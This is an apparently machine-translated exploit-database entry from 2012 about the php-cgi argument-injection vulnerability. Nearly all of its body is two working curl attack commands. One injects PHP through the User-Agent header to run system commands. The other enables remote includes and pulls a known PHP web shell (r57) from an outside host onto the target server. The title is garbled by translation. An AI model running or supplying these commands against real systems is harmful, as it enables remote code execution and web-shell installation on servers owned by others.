php-cgi exploit EXP-vulnerability warning-the black bar safety net

2012-05-11T00:00:00
ID MYHACK58:62201233846
Type myhack58
Reporter 佚名
Modified 2012-05-11T00:00:00

Description

1, local contains direct code execution:

curl-H "USER-AGENT: <? system('id');die();?& gt;" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2, The remote contains the implementation code:

curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt

!